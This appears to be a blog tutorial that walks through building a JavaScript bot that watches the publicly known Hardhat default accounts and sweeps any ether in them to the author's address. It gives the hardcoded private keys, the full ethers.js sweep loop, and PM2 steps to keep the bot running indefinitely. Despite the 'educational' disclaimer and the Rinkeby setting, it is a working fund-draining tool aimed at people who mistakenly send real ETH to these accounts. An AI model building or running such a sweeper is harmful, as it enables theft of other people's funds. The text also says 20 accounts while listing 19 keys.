Skip to content Skip to sidebar Skip to footer

This guide is intended for educational and/or research purposes only!

During this tutorial, we’ll build a bot that automatically withdraws funds from an account whenever it receives Ethereum.

Important: It’s critical to realize that if a user’s private key is stolen, their account will be automatically compromised. A private key is being sought by bots all over the place! If you publish your private key on GitHub or another website by mistake, you will lose all of your funds and the security of your account will be permanently compromised.

We’ll use accounts from Hardhat for this example (Hardhat is an Ethereum developer environment). For testing purposes, Hardhat provides you with 20 deterministic accounts, but some people mistakenly send real Ethereum to those accounts. There are a lot of hungry bots out there, eager to get their hands on that ether.

In our case we will launch the bot on Rinkeby (Ethereum test network) in order to avoid competing with Mainnet bots.

Get access to Hardhat private keys

Running the command npx hardhat node will retrieve the private keys. You don’t need to follow this command. I’ve listed the private keys below so you can copy and paste them easily.

hardhat private keys ethereum

Important: Every user requesting Hardhat accounts will get the same data. If we look at one of the above accounts’ MainNet transaction history, we can see that there have been multiple transfers in the past.

Hardhat Ethereum Transactions on Mainnet

Create the Ethereum bot

We will build the bot using JavaScript, with the only dependencies being NodeJS and the ethers library. The ethers.js library aims to be a complete and compact library for interacting with the Ethereum Blockchain and its ecosystem.

Run the following commands:

mkdir eth_bot
cd eth_bot
npm init
npm i ethers 
touch eth_bot.js

Add the following code to eth_bot.js file:

const { ethers } = require("ethers");
const provider = new ethers.providers.JsonRpcProvider("rinkeby_or_alchemy_or_infura_url");
const addressReceiver = "your_eth_address";

const privateKeys =
     ["0xac0974bec39a17e36ba4a6b4d238ff944bacb478cbed5efcae784d7bf4f2ff80",
      "0x59c6995e998f97a5a0044966f0945389dc9e86dae88c7a8412f4603b6b78690d",
      "0x7c852118294e51e653712a81e05800f419141751be58f605c371e15141b007a6",
      "0x47e179ec197488593b187f80a00eb0da91f1b9d0b13f8733639f19c30a34926a",
      "0x8b3a350cf5c34c9194ca85829a2df0ec3153be0318b5e2d3348e872092edffba",
      "0x92db14e403b83dfe3df233f83dfa3a0d7096f21ca9b0d6d6b8d88b2b4ec1564e",
      "0x4bbbf85ce3377467afe5d46f804f221813b2bb87f24d81f60f1fcdbf7cbf4356",
      "0xdbda1821b80551c9d65939329250298aa3472ba22feea921c0cf5d620ea67b97",
      "0x2a871d0798f97d79848a013d4936a73bf4cc922c825d33c1cf7073dff6d409c6",
      "0xf214f2b2cd398c806f84e317254e0f0b801d0643303237d97a22a48e01628897",
      "0x701b615bbdfb9de65240bc28bd21bbc0d996645a3dd57e7b12bc2bdf6f192c82",
      "0xa267530f49f8280200edf313ee7af6b827f2a8bce2897751d06a843f644967b1",
      "0x47c99abed3324a2707c28affff1267e45918ec8c3f20b8aa892e8b065d2942dd",
      "0xc526ee95bf44d8fc405a158bb884d9d1238d99f0612e9f33d006bb0789009aaa",
      "0x8166f546bab6da521a8369cab06c5d2b9e46670292d85c875ee9ec20e84ffb61",
      "0xea6c44ac03bff858b476bba40716402b03e41b8e97e276d1baec7c37d42484a0",
      "0x689af8efa8c651a91ad287602527f3af2fe9f6501a7ac4b061667b5a93e037fd",
      "0xde9be858da4a475276426320d5e9262ecfc3ba460bfac56360bfa6c4c28b4ee0",
      "0xdf57089febbacf7ba0bc227dafbffa9fc08a93fdc68e1e42411a14efcf23656e"
     ];

Add an Infura, Alchemy or any other provider’s URL to const provider and your ETH address to the addressReceiver constant.

We can now get to work on the actual bot. Just after the privateKeys array, insert the following code:

const bot = async () => {
  provider.on("block", async () => {
    console.log("Listening new block, waiting..)");
    for (let i = 0; i < privateKeys.length; i++) {
      const _target = new ethers.Wallet(privateKeys[i]);
      const target = _target.connect(provider);
      const balance = await provider.getBalance(target.address);
      const txBuffer = ethers.utils.parseEther(".005");
      if (balance.sub(txBuffer) > 0) {
        console.log("NEW ACCOUNT WITH ETH!");
        const amount = balance.sub(txBuffer);
        try {
          await target.sendTransaction({
            to: addressReceiver,
            value: amount
          });
          console.log(`Success! transfered --> ${ethers.utils.formatEther(balance)}`);
        }
        catch (e) {
            console.log(`error: ${e}`);
        }
      }
    }
  });
}

bot();

Every time a new block is mined, we are listening and iterating over the 20 accounts to see if they have any Ethereum. If affirmative, we transfer the funds to our ETH address.

Run the Ethereum Bot

When you’re ready, run the following command and start the bot: node eth_bot.js

Keep the Ethereum bot running indefinitely

PM2 is a Node.js process manager with an integrated load balancer. It makes it easier to make production deployments and gives you the ability to run applications indefinitely (even when accidents occur).

Install PM2 by running the following command: npm i pm2

The PM2 binary can be used to start the bot in background. In order to keep the bot running indefinitely, it starts a daemon that monitors your application.

Run the following command and start the bot using PM2: pm2 start eth_bot.js

Ethereum Bot PM2

Have fun!

Leave a comment

> Newsletter <
Interested in Tech News and more?

Subscribe